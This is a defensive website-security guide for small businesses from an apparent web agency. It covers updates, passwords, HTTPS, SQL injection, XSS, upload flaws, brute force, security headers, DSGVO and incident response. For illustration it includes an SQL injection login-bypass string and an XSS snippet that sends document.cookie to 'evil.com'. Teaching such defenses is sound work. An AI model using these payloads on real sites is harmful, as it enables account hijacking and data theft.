Website Sicherheit 2025: So schützen Sie Ihre Website vor Hackern und Datenlecks
30,000 websites get hacked every day.
Not big corporations. Small businesses. Praxen. Online-Shops. Restaurants.
"Why would anyone hack MY website?" Famous last words before you wake up to a defaced homepage, stolen customer data, and a €20,000 DSGVO fine.
Here's the brutal truth: Hackers don't target you specifically. They run automated bots that scan millions of sites looking for vulnerabilities. If you're not protected, you WILL get hit.
Let me show you exactly how to protect your website, your customers, and your business.
Warum Website Security 2025 kritisch ist#
Die erschreckenden Zahlen
Cyber Crime Statistics:
- 30,000 websites hacked daily
- 43% of cyber attacks target small businesses
- 60% of small businesses close within 6 months after a breach
- Average cost of data breach: €150,000-500,000
- DSGVO fines: up to €20 million or 4% of revenue
What hackers want:
- Customer data (sell on dark web)
- Credit card info (obvious)
- Email addresses (spam/phishing)
- Server resources (crypto mining, botnet)
- SEO hijacking (inject spam links)
- Ransomware (pay to get site back)
Real Impact:
Example 1: Online-Shop
Breach: Customer credit cards stolen
Result:
- €50,000 in chargebacks
- €80,000 DSGVO fine
- Lost reputation
- Business closed
Example 2: Arztpraxis
Breach: Patient data leaked
Result:
- €30,000 DSGVO fine
- Lawsuits from patients
- Lost trust
- 40% revenue drop
Yeah. Security isn't optional.
Die häufigsten Sicherheitslücken#
1. Veraltete Software
The Problem:
- Outdated WordPress: 90% of hacked sites
- Old plugins: #1 entry point
- Outdated PHP: known vulnerabilities
Why it happens:
- "If it works, don't update"
- Fear of breaking site
- Lazy maintenance
- No automatic updates
The Fix:
# Check versions WordPress: Should be latest (currently 6.4+) PHP: Should be 8.1+ (not 7.x!) Plugins: Update within 48h of release # Enable auto-updates (WordPress) wp-config.php: define('WP_AUTO_UPDATE_CORE', true); define('AUTOMATIC_UPDATER_DISABLED', false);
2. Schwache Passwörter
Common passwords (still!):
1. 123456
2. password
3. 123456789
4. admin
5. qwerty
If your password is on this list, you deserve to get hacked.
Strong Password Rules:
- Minimum 16 characters
- Mix: uppercase, lowercase, numbers, symbols
- No dictionary words
- No personal info
- Unique per site
Example Strong Password:
Weak: admin123
Strong: K9$mPx#vL2@nQ8wR4tY
Better: Use Password Manager:
- 1Password (€3/month)
- Bitwarden (Free)
- LastPass (€3/month)
Generate 20+ character random passwords. You'll never remember them. That's the point.
3. Kein SSL/HTTPS
HTTP vs HTTPS:
HTTP = Data sent in plain text (anyone can read)
HTTPS = Data encrypted (secure)
Why SSL matters:
- Google ranks HTTPS higher
- Browsers show "Not Secure" warning
- Customer trust destroyed
- Required for payments
- DSGVO compliance
How to get SSL:
Free: Let's Encrypt (most hosts include this)
Paid: €50-200/year (not necessary for most)
Check if active:
https://www.ssllabs.com/ssltest/
Force HTTPS redirect:
# .htaccess RewriteEngine On RewriteCond %{HTTPS} off RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
4. SQL Injection
What it is: Attackers inject malicious code into database queries.
Example Attack:
-- Normal login: SELECT * FROM users WHERE username='admin' AND password='pass123' -- Injection attack: username: admin'-- SELECT * FROM users WHERE username='admin'--' AND password='pass123' -- Everything after -- is ignored = logged in!
How to prevent:
1. Prepared Statements (PHP):
// ❌ VULNERABLE $query = "SELECT * FROM users WHERE id = " . $_GET['id']; // ✅ SAFE $stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?"); $stmt->execute([$_GET['id']]);
2. Input Validation:
// Validate user input $id = filter_var($_GET['id'], FILTER_VALIDATE_INT); if ($id === false) { die("Invalid input"); }
3. Escape Output:
echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');
5. Cross-Site Scripting (XSS)
What it is: Injecting malicious JavaScript into pages.
Example Attack:
// User submits comment: <script> fetch('https://evil.com/steal?cookie=' + document.cookie) </script> // Now attacker has session cookies = account hijacked
How to prevent:
1. Escape all user input:
// Before displaying user content echo htmlspecialchars($comment, ENT_QUOTES, 'UTF-8');
2. Content Security Policy (CSP):
// header.php header("Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' https://trusted-cdn.com");
3. Validate input:
// Only allow expected characters const sanitized = input.replace(/[^a-zA-Z0-9]/g, '');
6. File Upload Vulnerabilities
The Attack:
1. Attacker uploads malicious PHP file disguised as image
2. File saved to /uploads/evil.php
3. Attacker visits yoursite.com/uploads/evil.php
4. Malicious code executes
5. Site owned
How to prevent:
1. Validate file type (not just extension):
$allowed = ['image/jpeg', 'image/png', 'image/gif']; $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo, $_FILES['upload']['tmp_name']); if (!in_array($mime, $allowed)) { die('Invalid file type'); }
2. Rename uploaded files:
$extension = pathinfo($_FILES['upload']['name'], PATHINFO_EXTENSION); $newName = md5(uniqid()) . '.' . $extension; move_uploaded_file($_FILES['upload']['tmp_name'], "/uploads/$newName");
3. Store outside web root:
❌ /public/uploads/ (accessible)
✅ /storage/uploads/ (not directly accessible)
7. Brute Force Attacks
What it is: Automated login attempts with common passwords.
Example:
Login attempt 1: admin / 123456 ❌
Login attempt 2: admin / password ❌
Login attempt 3: admin / admin123 ❌
...
Login attempt 847: admin / MyP@ssw0rd! ✅
How to prevent:
1. Limit login attempts:
// After 5 failed attempts, block for 30 minutes $attempts = get_failed_attempts($ip); if ($attempts >= 5) { die('Too many failed attempts. Try again in 30 minutes.'); }
2. Use CAPTCHA:
<!-- Google reCAPTCHA --> <script src="https://www.google.com/recaptcha/api.js"></script> <div class="g-recaptcha" data-sitekey="your-key"></div>
3. Two-Factor Authentication (2FA):
- Google Authenticator
- SMS codes
- Email codes
WordPress plugins:
- Wordfence Security (free)
- iThemes Security (free)
- Sucuri Security (free)
8. DDoS Attacks
What it is: Overwhelming your server with fake traffic until it crashes.
Example:
Normal: 1,000 visitors/day
DDoS: 100,000 requests/second from botnet
Result: Server crashes, site down
How to prevent:
1. Use CDN with DDoS protection:
- Cloudflare (Free plan includes basic protection)
- AWS CloudFront
- Akamai (enterprise)
2. Rate limiting:
# Nginx config limit_req_zone $binary_remote_addr zone=one:10m rate=1r/s;
3. Fail2Ban:
# Blocks IPs after repeated failed requests sudo apt-get install fail2ban
Security Best Practices#
1. SSL/TLS Konfiguration
Minimum Requirements:
- TLS 1.2+ only (disable TLS 1.0/1.1)
- Strong cipher suites
- HSTS enabled
- Certificate from trusted CA
Test your SSL:
https://www.ssllabs.com/ssltest/
Goal: A+ rating
HSTS Header:
header('Strict-Transport-Security: max-age=31536000; includeSubDomains; preload');
2. Security Headers
Add these to every page:
// Prevent clickjacking header('X-Frame-Options: SAMEORIGIN'); // XSS Protection header('X-XSS-Protection: 1; mode=block'); // Content Type sniffing header('X-Content-Type-Options: nosniff'); // Referrer Policy header('Referrer-Policy: strict-origin-when-cross-origin'); // Content Security Policy header("Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' https://trusted.cdn.com");
Test headers:
https://securityheaders.com/
Goal: A rating
3. Database Security
Best Practices:
1. Separate database user per application:
-- Don't use root! CREATE USER 'website_user'@'localhost' IDENTIFIED BY 'strong_password_here'; GRANT SELECT, INSERT, UPDATE, DELETE ON website_db.* TO 'website_user'@'localhost';
2. Disable remote access:
# my.cnf bind-address = 127.0.0.1
3. Regular backups:
# Daily automated backup mysqldump -u root -p database_name > backup-$(date +%Y%m%d).sql
4. Encrypted connections:
$pdo = new PDO( 'mysql:host=localhost;dbname=db', 'user', 'pass', [PDO::MYSQL_ATTR_SSL_CA => '/path/to/ca-cert.pem'] );
4. File Permissions
Correct permissions:
# Directories chmod 755 /var/www/html/ # Files chmod 644 /var/www/html/index.php # Sensitive config chmod 600 /var/www/html/wp-config.php # Never 777!
Why 777 is dangerous:
777 = Everyone can read, write, execute
= Hacker can upload malicious file
= Site compromised
5. Backup Strategy
3-2-1 Rule:
- 3 copies of data
- 2 different storage types
- 1 off-site copy
What to backup:
- Database (daily)
- Files/uploads (weekly)
- Configuration files (weekly)
- Email (monthly)
Backup Tools:
Manual:
# Database mysqldump -u user -p database > backup.sql # Files tar -czf backup.tar.gz /var/www/html/
Automated:
- UpdraftPlus (WordPress)
- Acronis
- Backblaze (€6/month)
- AWS S3 + Glacier
Test restores! Backup is useless if you can't restore.
6. Monitoring & Alerts
What to monitor:
- Failed login attempts
- File changes
- Malware scans
- Uptime
- SSL certificate expiry
- Security updates
Tools:
Free:
- Wordfence (WordPress)
- Sucuri SiteCheck
- Google Search Console
- Uptime Robot
Paid:
- Sucuri Security ($200/year)
- SiteLock ($100-500/year)
- Cloudflare (free-$200/month)
Set up alerts:
- Email on failed login (5+ attempts)
- SMS on site down
- Slack notification on file changes
- Weekly security reports
DSGVO & Privacy#
Must-Haves für DSGVO Compliance
1. SSL/HTTPS
Encrypted data transmission = required
2. Privacy Policy
Must include:
- What data you collect
- Why you collect it
- How long you store it
- How users can delete it
- Who has access
3. Cookie Consent
Required for:
- Analytics cookies
- Marketing cookies
- Third-party cookies
Not required for:
- Essential cookies (session, security)
Cookie Banner Best Practices:
// Use consent management platform - Cookiebot (€9/month) - OneTrust - Complianz (WordPress) Requirements: ✅ Clear "Accept" button ✅ Clear "Reject" button (not buried!) ✅ Granular choices (Analytics, Marketing, etc.) ✅ Easy to revoke consent
4. Data Processing Agreement (if you use tools):
Google Analytics → Need DPA
Mailchimp → Need DPA
Hosting Provider → Need DPA
Payment Processor → Need DPA
5. User Rights:
Users must be able to:
- Access their data
- Export their data
- Delete their data
- Object to processing
Implementation:
// Delete user data endpoint POST /api/user/delete Authorization: Bearer {token} // Export user data GET /api/user/export Response: JSON with all user data
DSGVO Strafen vermeiden
Common violations:
€20,000 Fine:
- No privacy policy
- No cookie consent
- No SSL for forms
€50,000+ Fine:
- Data breach not reported (72h!)
- Selling user data without consent
- No data processing agreements
€20M or 4% revenue:
- Major data breach with negligence
- Systematic violations
- Refusing to comply
How to stay compliant:
✅ SSL everywhere
✅ Privacy policy (updated!)
✅ Cookie consent
✅ Data processing agreements
✅ Regular security audits
✅ Incident response plan
✅ Data retention policy
✅ User data export/delete
WordPress-spezifische Security#
Must-Have Plugins:
1. Wordfence Security (Free)
Features:
- Firewall
- Malware scanner
- Login security
- 2FA
- Real-time threat defense
2. iThemes Security (Free)
Features:
- Brute force protection
- File change detection
- 404 monitoring
- Strong password enforcement
3. Sucuri Security (Free + Paid)
Features:
- Security scanner
- Malware removal
- Firewall (paid)
- DDoS protection (paid)
WordPress Hardening:
1. Change default admin username:
UPDATE wp_users SET user_login = 'new_admin' WHERE user_login = 'admin';
2. Disable file editing:
// wp-config.php define('DISALLOW_FILE_EDIT', true);
3. Hide WordPress version:
// functions.php remove_action('wp_head', 'wp_generator');
4. Disable XML-RPC:
# .htaccess <Files xmlrpc.php> Order Deny,Allow Deny from all </Files>
5. Limit login attempts:
Plugin: Limit Login Attempts Reloaded
Settings: 3 attempts, 20 minute lockout
6. Change database prefix:
// wp-config.php $table_prefix = 'xyz_'; // Not 'wp_'
Incident Response Plan#
If your site gets hacked:
Phase 1: Contain (First Hour)
1. Take site offline:
<!-- maintenance.html --> <h1>Scheduled Maintenance</h1> <p>We'll be back in 1 hour</p>
2. Assess damage:
- What was compromised?
- Customer data leaked?
- Files modified?
- Database accessed?
3. Notify relevant parties:
- Hosting provider (immediately)
- DSGVO authority (within 72 hours!)
- Affected customers (be transparent)
Phase 2: Clean (Hours 2-24)
1. Scan for malware:
# Use multiple scanners - Wordfence - Sucuri SiteCheck - Manual file review
2. Review access logs:
# Check who accessed what tail -n 1000 /var/log/apache2/access.log | grep "POST"
3. Restore from clean backup:
# Only if you have confirmed clean backup mysql -u user -p database < clean_backup.sql
4. Update everything:
- WordPress core
- All plugins
- All themes
- PHP version
- SSL certificate
5. Change all passwords:
- Admin accounts
- FTP/SFTP
- Database
- Hosting control panel
- Email accounts
Phase 3: Prevent (Days 2-7)
1. Security audit:
- How did they get in?
- What vulnerabilities exist?
- What else needs fixing?
2. Implement fixes:
- Patch vulnerabilities
- Add security headers
- Enable 2FA
- Set up monitoring
3. Monitor closely:
- Daily malware scans
- Watch access logs
- Check for suspicious activity
4. Document incident:
- What happened
- How it was resolved
- What was learned
- How to prevent next time
Security Checkliste#
Basics (Everyone):
- ✅ SSL/HTTPS aktiv
- ✅ Strong passwords (16+ characters)
- ✅ Software up-to-date
- ✅ Backups (automated, tested)
- ✅ Security plugin installed (WordPress)
- ✅ Spam protection (forms)
- ✅ DSGVO-konform (Cookie Banner, Privacy Policy)
Intermediate:
- ✅ 2FA enabled
- ✅ Firewall (WAF) aktiv
- ✅ Malware scanner
- ✅ Security headers configured
- ✅ Failed login monitoring
- ✅ File integrity monitoring
- ✅ Database backups (daily)
Advanced:
- ✅ Penetration testing (yearly)
- ✅ Security audit (quarterly)
- ✅ Intrusion detection
- ✅ DDoS protection
- ✅ Incident response plan
- ✅ Security training (team)
- ✅ Bug bounty program
Security Tools & Resources#
Free Scanners:
- Sucuri SiteCheck: https://sitecheck.sucuri.net/↗
- Qualys SSL Labs: https://www.ssllabs.com/ssltest/↗
- Security Headers: https://securityheaders.com/↗
- Mozilla Observatory: https://observatory.mozilla.org/↗
WordPress Security:
- Wordfence: https://wordfence.com/↗
- iThemes Security: https://ithemes.com/security/↗
- Sucuri: https://sucuri.net/↗
Monitoring:
- Uptime Robot: https://uptimerobot.com/↗ (free)
- Pingdom: https://pingdom.com/↗
- StatusCake: https://statuscake.com/↗
Learning Resources:
- OWASP Top 10: https://owasp.org/www-project-top-ten/↗
- Have I Been Pwned: https://haveibeenpwned.com/↗
Fazit: Security ist kein Projekt, sondern ein Prozess#
Here's the reality:
One-time security setup = false sense of security
Security requires:
- Regular updates (weekly)
- Monitoring (daily)
- Backups (automated)
- Audits (quarterly)
- Education (ongoing)
Cost of Prevention vs. Cost of Breach:
Prevention: €50-200/Monat
- Security tools
- Monitoring
- Backups
- Updates
Data Breach: €50,000-500,000+
- DSGVO fines
- Lost revenue
- Reputation damage
- Legal fees
- Business closure
Yeah. Prevention is way cheaper.
Don't wait until you get hacked. By then it's too late.
Brauchen Sie Website Security Hilfe?
Wir führen Security Audits durch und härten Websites gegen Angriffe. Schützen Sie Ihr Business.